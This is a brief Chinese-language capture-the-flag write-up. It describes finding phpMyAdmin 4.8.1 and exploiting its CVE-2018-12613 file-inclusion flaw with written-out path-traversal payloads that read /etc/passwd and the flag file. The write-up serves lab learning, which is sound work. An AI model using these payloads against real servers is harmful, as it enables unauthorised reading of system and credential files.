打开环境访问看到
提示我有一个数据库,但里面什么都没有,于是拿dirsearch跑了一下,没有出结果
但是有数据库嘛,那么试试常见的几个加上phpmyadmin
试试
于是看到了版本是4.8.1
拿到信息
百度一下 phpmyadmin4.8.1
漏洞
看到最多的是文件包含漏洞 编号 CVE-2018-12613
那么思路肯定就是复现漏洞了,于是开始找 poc
然后直接开打
构造payload
index.php?target=db_datadict.php%253f../../../../../../etc/passwd
发现回显
最后的payload
index.php?target=db_datadict.php%253f../../../../../../flag
得到flag